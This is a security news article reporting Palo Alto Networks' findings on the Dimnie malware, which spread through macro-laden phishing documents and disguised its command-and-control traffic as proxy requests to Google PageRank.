14 DAY TRIAL // For more than three years, one malware family managed to fly under the radar of researchers thanks to its stealthy command and control methods.
According to researchers from the Palo Alto Networks, the malware family, dubbed Dimnie, was discovered in mid-January when it was in the middle of a campaign targeting open-source developers via phishing emails. It seems that emails contained a malicious .doc file that contained embedded macro code set to execute a PowerShell command to download and execute another file.
Palo Alto Networks says it observed samples of this malware as far back as early 2014, with identical command and control mechanisms. "The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign," researchers explain in a post.
Stealthy job
By looking at the malware's communication with the C&C infrastructure, researchers have determined that it uses HTTP Proxy requests to the Google PageRank service, which was shut down last year. Because the absolute URI in the HTTP request links to a non-existent service, the server isn't acting as a proxy, and this is simply a way to camouflage itself.
Researchers concluded that the malware's main functionality appears to be stealing information and reconnaissance. The modular framework, however, allows hackers to use a wider range of capabilities that have not been observed during analysis.
"Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown," Palo Alto researchers conclude.